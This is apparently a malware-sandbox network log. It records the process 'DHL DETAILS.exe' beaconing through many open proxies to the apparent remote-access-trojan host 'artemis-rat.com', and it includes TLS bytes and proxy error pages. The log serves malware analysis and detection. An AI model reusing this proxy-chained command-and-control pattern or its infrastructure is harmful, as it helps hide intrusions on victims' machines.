Mar 9, 2024 13:14:20.415365934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.717690945 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.3
Mar 9, 2024 13:14:20.717950106 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 9b b0 86 df 10 ce 07 05 1d 54 8b a6 87 cf 36 8c 3c e9 84 38 80 ba e3 03 23 53 a6 15 46 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRT6<8#SF*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:21.027976036 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 9c 74 68 ae d9 f4 80 a2 5f 05 9d 0c cc ed 16 d6 c5 77 e8 4d 16 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRth_wMDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:21.028197050 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
Mar 9, 2024 13:14:21.028234005 CET	1286	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:21.484170914 CET	736	IN	Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ
Mar 9, 2024 13:14:21.486357927 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 5b a4 4f f2 31 fd 53 59 f9 0f 77 2c ee bc d4 e2 03 07 b9 1e 61 84 92 e2 f2 64 cb 09 18 24 dc 62 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 dc bd 44 0d 1c 31 fc c8 75 7d 97 2c 04 a6 1e 27 2d 1a dd b5 c4 Data Ascii: %! [O1SYw,ad$b(D1u},'-85
Mar 9, 2024 13:14:21.792527914 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 a9 9d f0 34 4d a0 e2 87 3b ef f0 83 ae 87 70 f7 21 c1 8a ad 52 a5 56 86 cc f2 3d c9 c1 60 44 3b b7 cd 77 4b 2c cc 44 ef 29 a4 9a 1a 41 70 e1 4e ce 3a f7 4a 9e 6d cd 33 d3 15 69 e4 b5 17 b4 96 78 2b 65 Data Ascii: 4M;p!RV=`D;wK,D)ApN:Jm3ix+e5~Uvl.f*79+NqDv}V?C\g8mhO+[oW^_c)k3l\|4e=i/%Po)v9=Dw3F\|[(wj/@zr
Mar 9, 2024 13:14:21.794203997 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 c6 9c d2 4a 39 2e 32 64 23 b3 19 ab b0 46 be a2 1c e8 54 9e cb 47 af 79 11 da 31 00 63 5c 1f 3f bc 2e 59 06 95 99 56 fd 2f 79 c1 db 9e 6f ce dc 74 8e 7f d6 fb d7 eb 73 68 cb 8e 01 f7 df 5d bd c8 b7 50 94 f2 Data Ascii: J9.2d#FTGy1c\?.YV/yotsh]P!/?ZqTfX+ue=yhv6D$AynMg,T0#}cNYb aC$hZ_nT0qqv{OwPw`O?j?rJ\|obMK,M
Mar 9, 2024 13:14:22.104242086 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 8c 66 0c c0 cd 06 9a 46 e4 23 d3 70 4e b1 85 43 f9 ab 95 86 eb a1 78 39 55 3b 84 be 73 7f 02 0f 70 45 d7 6f c0 d7 7e dc 76 fd 89 da 2a 7a 31 f2 b8 98 67 46 09 94 85 1c eb eb 1b 35 fa 0a f2 b4 2a 51 2e 8f df Data Ascii: qfF#pNCx9U;spEo~vz1gF5Q.7h4t%GoCpQo.mP_T;!~3_s5U!/LjV1]5wD1MiUw^0QUD\2N%G%)DaYlm
Mar 9, 2024 13:14:22.104327917 CET	1286	IN	Data Raw: d2 ce ec e9 00 8f 2b 20 fa 5e d6 fe 7f ce 1d da db a8 2e 49 87 ca c5 28 ec 32 4c 68 81 a3 a3 af 10 5a 6d 76 4e ab 37 8b cf 47 f7 67 8d c6 59 fa 31 e4 9a ae 97 ff a2 ea f5 9c 22 6c 7f 6e a9 b0 45 be 9a d9 e1 ac 4e ce 36 38 ea 34 5b fd 90 1f 98 53 Data Ascii: + ^.I(2LhZmvN7GgY1"lnEN684[S,W?LT5EvWxq;s_Wp3E5eb58y=DTN0+@QN5OktnR0tQu:,%^eO$'MFeI5c>(B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1697	192.168.2.5	50628	148.72.215.230	44387	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.466773987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1698	192.168.2.5	55129	123.57.246.163	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.466773987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.793601990 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1699	192.168.2.5	55102	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.468859911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1700	192.168.2.5	55135	201.13.147.161	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.469274998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1701	192.168.2.5	55148	60.205.132.71	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.469351053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.797003031 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1702	192.168.2.5	55191	3.123.150.192	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.469352007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.774338961 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:20 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1703	192.168.2.5	55104	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.473740101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1704	192.168.2.5	55203	200.10.73.210	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.475527048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1705	192.168.2.5	55213	161.97.173.42	27172	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.477114916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177129030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1706	192.168.2.5	55206	91.189.177.186	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.525875092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.849178076 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1707	192.168.2.5	50991	212.47.245.57	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.529535055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.567653894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.580302954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.677306890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1708	192.168.2.5	50893	51.15.252.246	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.529556036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1709	192.168.2.5	55201	5.252.23.220	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.530828953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1710	192.168.2.5	55053	5.44.42.115	58386	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.533704996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1711	192.168.2.5	55225	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.534879923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1712	192.168.2.5	55098	211.93.2.190	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.535017967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.010783911 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1713	192.168.2.5	55227	203.222.24.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
